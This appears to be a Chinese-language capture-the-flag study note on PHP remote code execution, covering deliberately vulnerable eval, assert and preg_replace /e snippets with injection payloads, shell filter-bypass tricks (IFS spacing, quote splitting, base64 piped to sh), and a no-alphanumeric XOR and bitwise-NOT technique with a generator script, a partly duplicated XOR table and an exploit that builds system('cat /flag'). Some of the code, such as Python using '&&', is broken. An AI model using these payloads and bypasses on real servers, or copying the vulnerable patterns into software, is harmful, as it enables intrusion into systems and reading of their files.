RCE
代码执行的相关函数
eval函数会把函数内的语句当作php代码执行但是 语句后面需要分号
<?php
highlight_file(__FILE__);
$cmd=$_GET['cmd'];
eval($cmd);
?>
//?cmd=phpinfo();assert与eval功能相似 但是兼容性更强 后面加不加分号都可以
<?php
highlight_file(__FILE__);
$cmd=$_GET['cmd'];
assert($cmd);
?>
//?cmd=phpinfo();
//?cmd=phpinfo()安全防御:加引号
<?php
highlight_file(__FILE__);
$cmd=$_GET['cmd'];
eval("\ret= strtolower('$cmd');");
?>只有GPC配置文件开启才能绕过 高版本的PHP已经淘汰GPC
?cmd=');phpinfo();//preg_replace() 加上/e会 匹配之后会形成代码执行
<?php
preg_replace('/abc/e',$_REQUEST['cmd'],'abcd');
?>$_REQUEST 包含GET,POST,COOKIE方法
<?php
highlight_file(__FILE__);
$cmd = $_GET['cmd'];
preg_replace('/<data>(.*)<\/data>/e','$ret="\\1"',$cmd);
echo $ret;
?>绕过
?cmd=<data>{${phpinfo()}}</data>命令执行相关函数
[PHP执行系统外部命令:exec()、passthru()、system()、shell_exec()
exec()函数无回显
因为exec没有回显,所以可以存入文件中,或借助print_r进行输出
使用姿势:echo exec("ls",$file);
exec(print_r(system(ls))); //system和print_r 都可以替换为作用相似的函数使用
或者使用linux命令tee内容写入到文件中
ls | tee 1.txt
然后访问1.txt就行
绕过技巧
1.空格被过滤
linux
%09(tap)
{cat,flag.txt}
cat${IFS}flag.txt
cat$IFS$9flag.txt
cat<flag.txt
cat<>flag.txt
kg=$'\x20flag.txt'&&cat$kg(\x20转换成字符串就是空格,这里通过变量的方式巧妙绕过)
windows下
(实用性不是很广,也就type这个命令可以用)
type.\flag.txt
type,flag.txt
echo,1234562.关键字被过滤
可以采用重命名变量然后拼接
eg.过滤了ls a=l;b=s;$a$b采用base64的方法绕过
`base64内容 | base64 -d`汇总几种关键字绕过方式 以flag为例 * 单引号绕过 fla'g' * 双引号绕过 fla"g" * 反斜线绕过 f\lag * 变量拼接绕过 a=g;cat$IFS$1fla$a.php * $+任意数字绕过 fl$1ag * Base64绕过 cat flag.php 的base64编码为Y2F0IGZsYWcucGhw echo$IFS$1Y2F0IGZsYWcucGhw|base64$IFS$1-d|sh * 内联绕过 就是将反引号内命令的输出作为输入执行 cat `ls`
命令执行相关内容
拼接符
& :前面和后面命令都要执行,无论前面真假
&&: 表示前一条命令执行成功时,才执行后一条命令
| :直接执行后面的语句
|| :表示上一条命令执行失败后,才执行下一条命令
; :表示命令依次执行贪婪匹配
表达式 .*就是单个字符匹配任意次,即贪婪匹配。以这个表达式为例:a.*b,它将会匹配最长的以a开始,以b结束的字符串,以第一个a开始,最后一个b结束。如果用它来搜索aabab的话,它会匹配整个字符串aabab。ls cat
ls(英文全拼:list files):用于显示指定工作目录下的内容(列出目前工作目录所含之文件及子目录)
cat(英文全拼:concatenate):用于连接文件并打印到标准输出设备上。
如果cat被过滤,可以用下边的方法进行绕过
(1)more:一页一页的显示档案内容
(2)less:与 more 类似,但是比 more 更好的是,他可以[pg dn][pg up]翻页
(3)head:查看头几行
(4)tac:从最后一行开始显示,可以看出 tac 是 cat 的反向显示
(5)tail:查看尾几行
(6)nl:显示的时候,顺便输出行号
(7)od:以二进制的方式读取档案内容
(8)vi:一种编辑器,这个也可以查看
(9)vim:一种编辑器,这个也可以查看
(10)sort:可以查看
(11)uniq:可以查看
(12)file -f:报错出具体内容内联执行
将指定的函数体插入并取代每一处调用该函数的地方。反引号 在linux中作为内联执行,执行输出结果。无数字和字母RCE、
1.异或绕过
<?php
$code =$_GET['code'];
if(preg_match('/[a-zA-Z0-9]+/')){
die('nonono');
}
?>用没有被过滤的符号异或生成对应的字母
异或结果没有是数字的
python脚本
c='-~@#$%^&*_+|/?.,<>`{}[]()'
for i in c:
for j in c:
if (ord(i)^ord(j))>64 && (ord(i)^ord(j))<91:
print('i ^ j = ',chr(ord(i)^ord(j)),ord(i)^ord(j))
elif (ord(i)^ord(j))>96 && (ord(i)^ord(j))<123:
print('i ^ j = ',chr(ord(i)^ord(j)),ord(i)^ord(j))
c='-~@#$%^&*_+|/?.,<>`{}[]()'
for r in range(97,123):
for i in c:
for j in c:
# print(ord(i) ^ ord(j))
if ord(i) ^ ord(j) == int(r):
print(i, '^', j, '=', chr(ord(i) ^ ord(j)), ord(i) ^ ord(j))
for r in range(65,91):
for i in c:
for j in c:
# print(ord(i) ^ ord(j))
if ord(i) ^ ord(j) == int(r):
print(i, '^', j, '=', chr(ord(i) ^ ord(j)), ord(i) ^ ord(j))~ ^ ? = A 65
? ^ ~ = A 65
< ^ } = A 65
} ^ < = A 65
~ ^ < = B 66
| ^ > = B 66
? ^ } = B 66
< ^ ~ = B 66
> ^ | = B 66
} ^ ? = B 66
# ^ ` = C 67
| ^ ? = C 67
? ^ | = C 67
> ^ } = C 67
` ^ # = C 67
} ^ > = C 67
$ ^ ` = D 68
? ^ { = D 68
` ^ $ = D 68
{ ^ ? = D 68
% ^ ` = E 69
> ^ { = E 69
` ^ % = E 69
{ ^ > = E 69
& ^ ` = F 70
` ^ & = F 70
< ^ { = G 71
{ ^ < = G 71
` ^ ( = H 72
( ^ ` = H 72
` ^ ) = I 73
) ^ ` = I 73
* ^ ` = J 74
` ^ * = J 74
+ ^ ` = K 75
` ^ + = K 75
, ^ ` = L 76
` ^ , = L 76
- ^ ` = M 77
` ^ - = M 77
. ^ ` = N 78
` ^ . = N 78
/ ^ ` = O 79
` ^ / = O 79
- ^ } = P 80
~ ^ . = P 80
+ ^ { = P 80
| ^ , = P 80
. ^ ~ = P 80
, ^ | = P 80
{ ^ + = P 80
} ^ - = P 80
- ^ | = Q 81
~ ^ / = Q 81
* ^ { = Q 81
| ^ - = Q 81
/ ^ ~ = Q 81
, ^ } = Q 81
{ ^ * = Q 81
} ^ , = Q 81
~ ^ , = R 82
| ^ . = R 82
/ ^ } = R 82
. ^ | = R 82
, ^ ~ = R 82
{ ^ ) = R 82
} ^ / = R 82
) ^ { = R 82
- ^ ~ = S 83
~ ^ - = S 83
| ^ / = S 83
/ ^ | = S 83
. ^ } = S 83
{ ^ ( = S 83
} ^ . = S 83
( ^ { = S 83
~ ^ * = T 84
* ^ ~ = T 84
| ^ ( = T 84
/ ^ { = T 84
{ ^ / = T 84
} ^ ) = T 84
( ^ | = T 84
) ^ } = T 84
~ ^ + = U 85
+ ^ ~ = U 85
| ^ ) = U 85
. ^ { = U 85
{ ^ . = U 85
} ^ ( = U 85
( ^ } = U 85
) ^ | = U 85
- ^ { = V 86
~ ^ ( = V 86
* ^ | = V 86
+ ^ } = V 86
| ^ * = V 86
{ ^ - = V 86
} ^ + = V 86
( ^ ~ = V 86
~ ^ ) = W 87
* ^ } = W 87
+ ^ | = W 87
| ^ + = W 87
, ^ { = W 87
{ ^ , = W 87
} ^ * = W 87
) ^ ~ = W 87
~ ^ & = X 88
# ^ { = X 88
$ ^ | = X 88
% ^ } = X 88
& ^ ~ = X 88
| ^ $ = X 88
{ ^ # = X 88
} ^ % = X 88
$ ^ } = Y 89
% ^ | = Y 89
| ^ % = Y 89
} ^ $ = Y 89
~ ^ $ = Z 90
$ ^ ~ = Z 90
& ^ | = Z 90
| ^ & = Z 90^ ^ ? = a 97
_ ^ > = a 97
? ^ ^ = a 97
< ^ ] = a 97
> ^ _ = a 97
] ^ < = a 97
^ ^ < = b 98
? ^ ] = b 98
< ^ ^ = b 98
] ^ ? = b 98
@ ^ # = c 99
# ^ @ = c 99
_ ^ < = c 99
< ^ _ = c 99
> ^ ] = c 99
] ^ > = c 99
@ ^ $ = d 100
$ ^ @ = d 100
? ^ [ = d 100
[ ^ ? = d 100
@ ^ % = e 101
% ^ @ = e 101
> ^ [ = e 101
[ ^ > = e 101
@ ^ & = f 102
& ^ @ = f 102
< ^ [ = g 103
[ ^ < = g 103
@ ^ ( = h 104
( ^ @ = h 104
@ ^ ) = i 105
) ^ @ = i 105
@ ^ * = j 106
* ^ @ = j 106
@ ^ + = k 107
+ ^ @ = k 107
@ ^ , = l 108
, ^ @ = l 108
- ^ @ = m 109
@ ^ - = m 109
@ ^ . = n 110
. ^ @ = n 110
@ ^ / = o 111
/ ^ @ = o 111
- ^ ] = p 112
^ ^ . = p 112
_ ^ / = p 112
+ ^ [ = p 112
/ ^ _ = p 112
. ^ ^ = p 112
[ ^ + = p 112
] ^ - = p 112
^ ^ / = q 113
* ^ [ = q 113
_ ^ . = q 113
/ ^ ^ = q 113
. ^ _ = q 113
, ^ ] = q 113
[ ^ * = q 113
] ^ , = q 113
- ^ _ = r 114
^ ^ , = r 114
_ ^ - = r 114
/ ^ ] = r 114
, ^ ^ = r 114
[ ^ ) = r 114
] ^ / = r 114
) ^ [ = r 114
- ^ ^ = s 115
^ ^ - = s 115
_ ^ , = s 115
. ^ ] = s 115
, ^ _ = s 115
[ ^ ( = s 115
] ^ . = s 115
( ^ [ = s 115
^ ^ * = t 116
* ^ ^ = t 116
_ ^ + = t 116
+ ^ _ = t 116
/ ^ [ = t 116
[ ^ / = t 116
] ^ ) = t 116
) ^ ] = t 116
^ ^ + = u 117
* ^ _ = u 117
_ ^ * = u 117
+ ^ ^ = u 117
. ^ [ = u 117
[ ^ . = u 117
] ^ ( = u 117
( ^ ] = u 117
- ^ [ = v 118
^ ^ ( = v 118
_ ^ ) = v 118
+ ^ ] = v 118
[ ^ - = v 118
] ^ + = v 118
( ^ ^ = v 118
) ^ _ = v 118
^ ^ ) = w 119
* ^ ] = w 119
_ ^ ( = w 119
, ^ [ = w 119
[ ^ , = w 119
] ^ * = w 119
( ^ _ = w 119
) ^ ^ = w 119
# ^ [ = x 120
% ^ ] = x 120
^ ^ & = x 120
& ^ ^ = x 120
[ ^ # = x 120
] ^ % = x 120
$ ^ ] = y 121
& ^ _ = y 121
_ ^ & = y 121
] ^ $ = y 121
$ ^ ^ = z 122
% ^ _ = z 122
^ ^ $ = z 122
_ ^ % = z 122^ ^ ? = a 97
_ ^ > = a 97
? ^ ^ = a 97
< ^ ] = a 97
> ^ _ = a 97
] ^ < = a 97
^ ^ < = b 98
? ^ ] = b 98
< ^ ^ = b 98
] ^ ? = b 98
@ ^ # = c 99
# ^ @ = c 99
_ ^ < = c 99
< ^ _ = c 99
> ^ ] = c 99
] ^ > = c 99
@ ^ $ = d 100
$ ^ @ = d 100
? ^ [ = d 100
[ ^ ? = d 100
@ ^ % = e 101
% ^ @ = e 101
> ^ [ = e 101
[ ^ > = e 101
@ ^ & = f 102
& ^ @ = f 102
< ^ [ = g 103
[ ^ < = g 103
@ ^ ( = h 104
( ^ @ = h 104
@ ^ ) = i 105
) ^ @ = i 105
@ ^ * = j 106
* ^ @ = j 106
@ ^ + = k 107
+ ^ @ = k 107
@ ^ , = l 108
, ^ @ = l 108
- ^ @ = m 109
@ ^ - = m 109
@ ^ . = n 110
. ^ @ = n 110
@ ^ / = o 111
/ ^ @ = o 111
- ^ ] = p 112
^ ^ . = p 112
_ ^ / = p 112
+ ^ [ = p 112
/ ^ _ = p 112
. ^ ^ = p 112
[ ^ + = p 112
] ^ - = p 112
^ ^ / = q 113
* ^ [ = q 113
_ ^ . = q 113
/ ^ ^ = q 113
. ^ _ = q 113
, ^ ] = q 113
[ ^ * = q 113
] ^ , = q 113
- ^ _ = r 114
^ ^ , = r 114
_ ^ - = r 114
/ ^ ] = r 114
, ^ ^ = r 114
[ ^ ) = r 114
] ^ / = r 114
) ^ [ = r 114
- ^ ^ = s 115
^ ^ - = s 115
_ ^ , = s 115
. ^ ] = s 115
, ^ _ = s 115
[ ^ ( = s 115
] ^ . = s 115
( ^ [ = s 115
^ ^ * = t 116
* ^ ^ = t 116
_ ^ + = t 116
+ ^ _ = t 116
/ ^ [ = t 116
[ ^ / = t 116
] ^ ) = t 116
) ^ ] = t 116
^ ^ + = u 117
* ^ _ = u 117
_ ^ * = u 117
+ ^ ^ = u 117
. ^ [ = u 117
[ ^ . = u 117
] ^ ( = u 117
( ^ ] = u 117
- ^ [ = v 118
^ ^ ( = v 118
_ ^ ) = v 118
+ ^ ] = v 118
[ ^ - = v 118
] ^ + = v 118
( ^ ^ = v 118
) ^ _ = v 118
^ ^ ) = w 119
* ^ ] = w 119
_ ^ ( = w 119
, ^ [ = w 119
[ ^ , = w 119
] ^ * = w 119
( ^ _ = w 119
) ^ ^ = w 119
# ^ [ = x 120
% ^ ] = x 120
^ ^ & = x 120
& ^ ^ = x 120
[ ^ # = x 120
] ^ % = x 120
$ ^ ] = y 121
& ^ _ = y 121
_ ^ & = y 121
] ^ $ = y 121
$ ^ ^ = z 122
% ^ _ = z 122
^ ^ $ = z 122
_ ^ % = z 122例如 flag
& ^ @ = f 102
@ ^ , = l 108
^ ^ ? = a 97
< ^ [ = g 103
flag = '&@^<'^'@,?['2.取反绕过
//EXP如下
<?php
highlight_file(__FILE__);
$code1="system";
$code2="cat /flllllaaaaaaggggggg";
echo "<br>";
echo "?wllm=(~".urlencode(~$code1).")(~".urlencode(~$code2).");";
